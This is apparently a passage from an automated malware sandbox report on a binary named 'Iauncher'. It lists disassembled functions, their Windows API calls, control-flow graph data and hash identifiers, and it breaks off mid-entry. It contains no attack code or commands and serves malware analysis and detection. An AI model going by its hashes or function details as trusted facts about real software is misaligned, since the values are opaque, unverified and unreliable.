                                                                                                                                                    • Instruction ID: 3b125f1dc94667b9a03349a1cc021e8bb8d722c65554d38c1a6d0825a22a939f
                                                                                                                                                    • Opcode Fuzzy Hash: e281234ca4adc7f903be0d184776f5feec9447226be7e2128d3bbc0f5c548025
                                                                                                                                                    • Instruction Fuzzy Hash: 7B21A234A002199BCB25CF29EC84AE9BBB9FF4C305B1480A9E90AD7211D630AD46DF60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 005756AA Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 307 5756aa-5756af 308 5756b1-5756c9 307->308 309 5756d7-5756e0 308->309 310 5756cb-5756cf 308->310 312 5756f2 309->312 313 5756e2-5756e5 309->313 310->309 311 5756d1-5756d5 310->311 314 57574c-575750 311->314 317 5756f4-575701 GetStdHandle 312->317 315 5756e7-5756ec 313->315 316 5756ee-5756f0 313->316 314->308 318 575756-575759 314->318 315->317 316->317 319 575703-575705 317->319 320 57572e-575740 317->320 319->320 322 575707-575710 GetFileType 319->322 320->314 321 575742-575745 320->321 321->314 322->320 323 575712-57571b 322->323 324 575723-575726 323->324 325 57571d-575721 323->325 324->314 326 575728-57572c 324->326 325->314 326->314
                                                                                                                                                    APIs
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 005756F6
                                                                                                                                                    • GetFileType.KERNELBASE(00000000), ref: 00575708
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileHandleType
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3000768030-0
                                                                                                                                                    • Opcode ID: 2ee5921308400156a606f52b4a7670dd123f84d7c95d24549cae5a69776b55da
                                                                                                                                                    • Instruction ID: 89cd0dbb67124cd34e30728e2606b3413bc552ec5bc03b8f6122bdc5b0c3ccb3
                                                                                                                                                    • Opcode Fuzzy Hash: 2ee5921308400156a606f52b4a7670dd123f84d7c95d24549cae5a69776b55da
                                                                                                                                                    • Instruction Fuzzy Hash: 3A11E771504F1186CB344A3EAC886267E95F7563B0B34471DD9BAC71F1E2B0C885B641
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00579CBE Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 538 579cbe-579ce0 539 579ce6-579cf8 GetCPInfo 538->539 540 579df9-579e1f 538->540 539->540 541 579cfe-579d05 539->541 542 579e24-579e29 540->542 543 579d07-579d11 541->543 544 579e33-579e39 542->544 545 579e2b-579e31 542->545 543->543 549 579d13-579d26 543->549 547 579e45 544->547 548 579e3b-579e3e 544->548 546 579e41-579e43 545->546 550 579e47-579e59 546->550 547->550 548->546 551 579d47-579d49 549->551 550->542 552 579e5b-579e69 call 5662ac 550->552 553 579d4b-579d82 call 5768b2 call 576ba9 551->553 554 579d28-579d2f 551->554 564 579d87-579dbc call 576ba9 553->564 557 579d3e-579d40 554->557 560 579d42-579d45 557->560 561 579d31-579d33 557->561 560->551 561->560 563 579d35-579d3d 561->563 563->557 567 579dbe-579dc8 564->567 568 579dd6-579dd8 567->568 569 579dca-579dd4 567->569 571 579de6 568->571 572 579dda-579de4 568->572 570 579de8-579df5 569->570 570->567 573 579df7 570->573 571->570 572->570 573->552
                                                                                                                                                    APIs
                                                                                                                                                    • GetCPInfo.KERNEL32(E8458D00,?,00579F0D,00579F01,00000000), ref: 00579CF0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Info
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1807457897-0
                                                                                                                                                    • Opcode ID: 8c954caa28a69af80de79f57de26dda47d61cc37d7384658e5895a76d9334143
                                                                                                                                                    • Instruction ID: 19ef95856742848eafab58b782dcc91f06e0f618460c714b3b4e2f507f8f9cbe
                                                                                                                                                    • Opcode Fuzzy Hash: 8c954caa28a69af80de79f57de26dda47d61cc37d7384658e5895a76d9334143
                                                                                                                                                    • Instruction Fuzzy Hash: BB5157B55042589ADB318A28EC84BE67FBCFB56304F2485ADE59ED7142D2309D46EF30
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00575A87 Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: cbab0a42871b9ea937295d23351b8a16228e7d71d31c0010a697f62726289bda
                                                                                                                                                    • Instruction ID: a998edc0cfed4071d67828e03e80ac55391737848ca88787199ff4e9356242c7
                                                                                                                                                    • Opcode Fuzzy Hash: cbab0a42871b9ea937295d23351b8a16228e7d71d31c0010a697f62726289bda
                                                                                                                                                    • Instruction Fuzzy Hash: B601F5337006119B9B128E29FC8595B3BA6BBC53243288530FD0DEB194FA70C800E790
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 005745C0 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00564449,?,?,00568DF4,?,?,?,?,?,005621CC,00564449,?,?,?,?), ref: 005745F2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                    • Opcode ID: db3f682a09f0bf732fdf7f43a21ebfcd24be71fef9f30e32c3bf9046a9a42b61
                                                                                                                                                    • Instruction ID: 428bdc8e2a89e143c35d20dc400db54ec0777545bea17be05bd25ebc3c94e04e
                                                                                                                                                    • Opcode Fuzzy Hash: db3f682a09f0bf732fdf7f43a21ebfcd24be71fef9f30e32c3bf9046a9a42b61
                                                                                                                                                    • Instruction Fuzzy Hash: 09E06535101236A7E7212A65BD05F5B3E99BF827B0F15C520BD0D9A191DF20DC00BEE5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 0057C951 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,0057CC6F,00000002,00000000,?,?,?,0057CC6F,?,00000000), ref: 0057C9EA
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,0057CC6F,00000002,00000000,?,?,?,0057CC6F,?,00000000), ref: 0057CA13
                                                                                                                                                    • GetACP.KERNEL32(?,?,0057CC6F,?,00000000), ref: 0057CA28
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                    • Opcode ID: c80178f70466929f71f528bbdf458f152e474148d50c14cdfaad13ce3f504c1a
                                                                                                                                                    • Instruction ID: 45478caaba0a80d430722199ddf6215c60e1025c950007917e33d186e39a60a4
                                                                                                                                                    • Opcode Fuzzy Hash: c80178f70466929f71f528bbdf458f152e474148d50c14cdfaad13ce3f504c1a
                                                                                                                                                    • Instruction Fuzzy Hash: 6521B272600105A6D770CB54E905AA77FA6BBA4B51B56C428EA0EEB200F732ED80F750
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0057CB26 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 005730E0: GetLastError.KERNEL32(?,00000008,00578F07,00000000,0056AC50), ref: 005730E4
                                                                                                                                                      • Part of subcall function 005730E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00573186
                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0057CC32
                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 0057CC7B
                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0057CC8A
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0057CCD2
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0057CCF1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 415426439-0
                                                                                                                                                    • Opcode ID: ded4c110391e929042fdbfb1266477f3a20666795af59582e171cc6205aea00b
                                                                                                                                                    • Instruction ID: bd4523835d3b5a07b10c0f2802c72d96e5fdefb03b04c6156f1879f96741d5b4
                                                                                                                                                    • Opcode Fuzzy Hash: ded4c110391e929042fdbfb1266477f3a20666795af59582e171cc6205aea00b
                                                                                                                                                    • Instruction Fuzzy Hash: A651A271A002069BDF21DFA5EC49ABE7FB8BF54700F14846DA91DEB180E7709E44AB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0057C1C2 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 005730E0: GetLastError.KERNEL32(?,00000008,00578F07,00000000,0056AC50), ref: 005730E4
                                                                                                                                                      • Part of subcall function 005730E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00573186
                                                                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,005717C6,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0057C283
                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,005717C6,?,?,?,00000055,?,-00000050,?,?), ref: 0057C2AE
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0057C411
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                                                    • String ID: utf8
                                                                                                                                                    • API String ID: 607553120-905460609
                                                                                                                                                    • Opcode ID: 4164da92a112a572d4f4baa9ddf91dd30f7939d8ed86995ca135d24dfdb39a58
                                                                                                                                                    • Instruction ID: 88d75c3615ef0f2ab5b081c3b020fa71d8a99a3f1552bdc153d4e4659c31158a
                                                                                                                                                    • Opcode Fuzzy Hash: 4164da92a112a572d4f4baa9ddf91dd30f7939d8ed86995ca135d24dfdb39a58
                                                                                                                                                    • Instruction Fuzzy Hash: 0A71F975600302AAEB24AB75EC4AB7A7FA8FF45710F14C42DF90DE7181EB70E940A761
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00574713 Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strrchr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3213747228-0
                                                                                                                                                    • Opcode ID: 45bf08c2e22f38f603408032c61045bde22d04295a5d25251943078c29725431
                                                                                                                                                    • Instruction ID: 42ad051388fbec0f6d81e1946b199e762bfbfe86021ed86e0408ff6f4cde26d7
                                                                                                                                                    • Opcode Fuzzy Hash: 45bf08c2e22f38f603408032c61045bde22d04295a5d25251943078c29725431
                                                                                                                                                    • Instruction Fuzzy Hash: D3B13332A002969FDB15CF68D881BEEBFA5FF55300F14C16AE908AB241D3349D01DFA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00566D9F Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00566DAB
                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00566E77
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00566E90
                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00566E9A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                    • Opcode ID: d9db23792d5fdcc4bd2eabfb1f5f22b4dc6c91e4e6c753f5aa6f2435c84218cb
                                                                                                                                                    • Instruction ID: e3548d3d52100d88690d9c31a4eaa138dea909d6d36d60e15e2ff9a09c9d6ad0
                                                                                                                                                    • Opcode Fuzzy Hash: d9db23792d5fdcc4bd2eabfb1f5f22b4dc6c91e4e6c753f5aa6f2435c84218cb
                                                                                                                                                    • Instruction Fuzzy Hash: 8531F775D05219DBDF20DFA4D9897CEBBB8BF18300F1041AAE90CAB250EB719A849F45
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0057C5D5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 005730E0: GetLastError.KERNEL32(?,00000008,00578F07,00000000,0056AC50), ref: 005730E4
                                                                                                                                                      • Part of subcall function 005730E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00573186
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0057C629
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0057C673
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0057C739
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoLocale$ErrorLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 661929714-0
                                                                                                                                                    • Opcode ID: 749d7cff1390e09fccbf0b1025a79ec146285687ae3c4b9e22c72a59c8b20363
                                                                                                                                                    • Instruction ID: b198d9caa1a3253524c7da8cc2bf68587b641088579bf972e51ea2cb5da221b8
                                                                                                                                                    • Opcode Fuzzy Hash: 749d7cff1390e09fccbf0b1025a79ec146285687ae3c4b9e22c72a59c8b20363
                                                                                                                                                    • Instruction Fuzzy Hash: 9A618F716102179BEB289F28EC86BAA7FA8FF44300F10C16DED09D6185EB34D985EF51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0056AAD3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0056ABCB
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0056ABD5
                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0056ABE2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                    • Opcode ID: 5d723c5fe6f29d7ccd8f30df69bf1545deea9131acc1537fa6f80d00c9516ee0
                                                                                                                                                    • Instruction ID: 1bbaaf84f9e6ea54bc001f6d8e51a6e9c982dc7ab7b2cc02f2367f985bb33824
